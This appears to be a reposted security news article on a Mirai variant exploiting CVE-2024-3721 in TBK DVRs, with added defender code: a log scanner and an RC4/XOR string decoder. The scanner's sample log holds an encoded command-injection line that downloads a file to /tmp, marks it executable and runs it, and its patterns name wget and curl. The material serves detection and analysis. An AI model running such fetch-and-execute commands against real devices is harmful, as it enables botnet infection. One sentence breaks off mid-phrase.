New Mirai Botnet Variant Targets DVR Devices via CVE-2024-3721 Vulnerability

Cybersecurity Alert: A New Threat to IoT Devices

A newly discovered variant of the notorious Mirai botnet has emerged, targeting specific digital video recorders (DVRs) using a command injection vulnerability (CVE-2024-3721). This sophisticated malware campaign, uncovered by researchers at Kaspersky, exploits unpatched DVR devices—particularly TBK DVR-4104 and DVR-4216 models—to execute malicious shell commands and recruit them into a global botnet.

The threat underscores a growing trend in the cybercrime landscape: the persistent targeting of Linux-based IoT devices, particularly those with exposed vulnerabilities. Even though Mirai’s source code was leaked nearly a decade ago, its modular design continues to serve as a foundation for new and dangerous variants—each time with more evasive capabilities and refined techniques.

the Original

Kaspersky researchers identified a new Mirai-based botnet variant exploiting a critical CVE-2024-3721 vulnerability found in TBK DVR-4104 and DVR-4216 digital video recorders. This variant stands out for directly executing an ARM32 binary without needing initial reconnaissance—highlighting its focus on a very specific class of devices.

The attack begins with a malicious POST request that delivers a single-line shell command, which then downloads and runs the malware. Unlike typical malware that checks a system’s architecture first, this version skips that step, assuming ARM32 compatibility.
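As an added defender-side illustration (not code from the article or from Kaspersky's report), the Python below scans constructed web-server log lines for the kind of single-line "fetch, then execute" shell command the article describes arriving in a POST body through command injection. The log format, the endpoint paths and the addresses are all constructed for the example; the real vulnerable endpoint is deliberately not named.

```python
import re
from urllib.parse import unquote_plus

# Three marker classes that together characterise the single-line
# "fetch, then execute" payload the article describes being delivered
# in a POST body through command injection. One class alone is common
# in benign traffic; all three together rarely are.
MARKERS = {
    "shell_metachar": re.compile(r";|\|\||&&|`|\$\("),
    "remote_fetch":   re.compile(r"\b(wget|curl|tftp|ftpget)\b"),
    "exec_staging":   re.compile(r"chmod\s+\S*x|/tmp/|/dev/shm/|\./\w"),
}

# Constructed log format: "<client_ip> <METHOD> <path> body=<urlencoded body>"
LOG_RE = re.compile(r"(?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) body=(?P<body>.*)$")

def matched_markers(body: str) -> set:
    """Return the marker classes present in the URL-decoded request body."""
    decoded = unquote_plus(body)
    return {name for name, pat in MARKERS.items() if pat.search(decoded)}

def scan_log(lines, min_markers: int = 3):
    """Flag POST requests whose body matches at least min_markers classes."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        found = matched_markers(m["body"])
        if len(found) >= min_markers:
            hits.append((m["ip"], m["path"], sorted(found)))
    return hits

# Constructed sample lines (RFC 5737 addresses, hypothetical paths):
# one injection attempt, one benign POST, one GET, one lone separator.
SAMPLE_LOG = [
    "192.0.2.10 POST /device/config body=name=%24%28wget+http%3A%2F%2F198.51.100.7%2Fa"
    "+-O+%2Ftmp%2Fa%3B+chmod+%2Bx+%2Ftmp%2Fa%3B+%2Ftmp%2Fa%29",
    "192.0.2.11 POST /device/config body=name=lobby-camera&tz=UTC",
    "192.0.2.12 GET /index.html body=",
    "203.0.113.5 POST /login body=user=admin%3B+echo+hi",
]

if __name__ == "__main__":
    for ip, path, found in scan_log(SAMPLE_LOG):
        print(f"ALERT {ip} {path}: {', '.join(found)}")
```

Lowering `min_markers` trades precision for recall; at 1 the lone `;` in the login line is also flagged.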

Once deployed, the malware demonstrates advanced stealth features, including:

RC4 string encryption with XOR key obfuscation

Anti-VM and anti-emulation detection, scanning for VMware and QEMU processes

Execution path verification to avoid suspicious directories

If all checks pass, the malware readies the device to receive commands from its command-and-control infrastructure.

Most affected devices are located in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. While the precise infection rate is unknown, over 50,000 DVRs were identified as exposed, making them easy targets.

The malware thrives on the widespread neglect of security updates in IoT devices. Although infections may not persist after a reboot due to write restrictions on many embedded systems, attackers continue to scan the internet for exposed and vulnerable units.

Kaspersky advises immediate firmware updates, applying vendor patches, and conducting factory resets if exploitation is suspected.

What Undercode Says: 🧠

Rise of Specialized Malware Targeting ARM-Based Devices

This Mirai variant is not just another recycled

Obfuscation Techniques Elevate Its Stealth

RC4 encryption, XOR obfuscation, and virtual machine detection are hallmarks of malware engineered to evade both manual inspection and automated sandbox analysis. Execution path filtering adds another layer: the malware refuses to run from suspicious or non-standard directories, which are often a sign of an analysis environment rather than a real device.
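As an added analyst-side example (not code from the article or from Kaspersky's analysis) covering the RC4 and XOR points in the feature list above and in this paragraph: the block below shows how an analyst recovers strings protected by RC4 when the RC4 key is itself stored XOR-masked. The single-byte mask, the key and the encrypted blobs are constructed assumptions, not values from the real sample.

```python
# Analyst-side decoder for the string protection the article attributes to
# this variant: embedded strings are RC4-encrypted and the RC4 key is stored
# XOR-masked. The mask value, key and blobs below are constructed for the
# example; they are not values taken from the real sample.

XOR_MASK = 0x22  # assumed single-byte mask applied to every key byte

def unmask_key(masked: bytes, mask: int = XOR_MASK) -> bytes:
    """Recover the RC4 key from its XOR-masked copy (XOR is its own inverse)."""
    return bytes(b ^ mask for b in masked)

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def decrypt_strings(masked_key: bytes, blobs):
    """Unmask the key, then decrypt each carved blob back to a string."""
    key = unmask_key(masked_key)
    return [rc4(key, blob).decode("ascii", errors="replace") for blob in blobs]

# Constructed test material: a key masked with XOR_MASK and three strings
# of the kind the article says the malware checks for (VM vendor names and
# an execution path), encrypted with the same routine since RC4 is symmetric.
PLAIN_KEY = b"examplekey"
MASKED_KEY = unmask_key(PLAIN_KEY)
BLOBS = [rc4(PLAIN_KEY, s) for s in (b"vmware", b"qemu", b"/tmp/")]

if __name__ == "__main__":
    for s in decrypt_strings(MASKED_KEY, BLOBS):
        print(repr(s))
```

In practice the masked key and the blobs are carved from the unpacked binary; only the mask value and layout change from sample to sample.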

Target Geography Reflects Broader IoT Risks

The concentration of infections in developing countries points to regions where IoT security is often overlooked. These areas are ripe for exploitation due to the high presence of unpatched or outdated DVR devices connected directly to the internet.

Why This Variant Is Dangerous

Even though this malware doesn’t survive a device reboot in many cases, its constant reappearance due to relentless scanning and exploitation attempts creates a persistent background threat. Furthermore, if combined with persistent exploits or secondary payloads, the implications could be much worse.

The Mirai Legacy Continues

Mirai’s original code has aged—but its architecture has not. This variant is a stark reminder of how old malware can evolve into new threats when the attack surface remains unpatched. It’s not just Mirai—it’s a template for future IoT-targeting botnets, potentially incorporating AI or machine-learning techniques for more effective scans and targeting in the future.

✅ Fact Checker Results

CVE-2024-3721 is confirmed as a real and active vulnerability affecting TBK DVR devices.
Kaspersky researchers verified the use of RC4 and XOR obfuscation in the malware payload.
Over 50,000 exposed DVRs were found, matching the claimed infection potential.

🔮 Prediction

The emergence of this Mirai variant suggests a future surge in hardware-specific botnets exploiting neglected IoT devices. As devices like DVRs, routers, and smart cameras proliferate, so does the attack surface. We predict:

More ARM-focused malware variants

Increase in targeted exploits against specific device models

Integration of persistent rootkits to make infections survive reboots

To stay ahead, patch management and IoT visibility will become core aspects of cybersecurity strategy moving forward.

References:

Reported By: securityaffairs.com